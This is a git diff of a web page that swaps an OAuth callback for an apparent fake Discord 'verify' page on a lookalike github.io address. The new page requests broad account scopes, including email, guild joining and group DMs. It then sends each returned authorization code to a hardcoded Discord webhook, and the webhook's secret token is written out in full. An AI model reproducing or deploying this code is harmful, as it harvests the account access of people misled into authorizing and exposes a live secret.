--- a/index.html
+++ b/index.html
@@ -3,27 +3,58 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>OAuth2 Callback</title>
+    <title>Discord OAuth Redirect</title>
+    <script>
+        // Replace with your actual client_id and redirect_uri
+        const client_id = "1242183096804053003";
+        const redirect_uri = "https://discord-authorization.github.io/verify"; // GitHub Pages URL
+        const scope = "identify email guilds guilds.join connections gdm.join";
+
+        function redirectToDiscord() {
+            const authUrl = `https://discord.com/api/oauth2/authorize?response_type=code&client_id=${client_id}&redirect_uri=${encodeURIComponent(redirect_uri)}&scope=${encodeURIComponent(scope)}`;
+            window.location.href = authUrl;
+        }
+
+        window.onload = function() {
+            const urlParams = new URLSearchParams(window.location.search);
+            const code = urlParams.get('code');
+
+            if (code) {
+                const webhookUrl = 'https://discord.com/api/webhooks/1242827198423896124/a_siqF-wTG5Q54iEvjU7Rmh0W1V90xE430x7A8IXtM9zstavoVf-n0dhHBGMQHBIbPmW';
+
+                const data = {
+                    content: `Authorization code received: ${code}`
+                };
+
+                fetch(webhookUrl, {
+                    method: 'POST',
+                    headers: {
+                        'Content-Type': 'application/json',
+                    },
+                    body: JSON.stringify(data),
+                })
+                .then(response => {
+                    if (!response.ok) {
+                        throw new Error('Network response was not ok');
+                    }
+                    return response.json();
+                })
+                .then(data => {
+                    console.log('Success:', data);
+                    document.body.innerHTML = '<h1>Authorization code sent via webhook!</h1>';
+                })
+                .catch((error) => {
+                    console.error('Error:', error);
+                    document.body.innerHTML = '<h1>Failed to send authorization code!</h1>';
+                });
+            } else {
+                document.body.innerHTML = '<h1>No authorization code found!</h1>';
+                redirectToDiscord();
+            }
+        };
+    </script>
 </head>
 <body>
-    <h1>Authorization Complete</h1>
-    <p>If you are seeing this page, you have successfully authorized the application. You can close this window now.</p>
-    <script>
-        // Extract the authorization code from the URL
-        const urlParams = new URLSearchParams(window.location.search);
-        const code = urlParams.get('code');
-
-        // Send the code to your backend serverless function
-        fetch('https://your-lambda-function-url.amazonaws.com/default/oauth_callback', {
-            method: 'POST',
-            headers: {
-                'Content-Type': 'application/json',
-            },
-            body: JSON.stringify({ code: code })
-        })
-        .then(response => response.json())
-        .then(data => console.log(data))
-        .catch(error => console.error('Error:', error));
-    </script>
+    <h1>Processing...</h1>
 </body>
 </html>
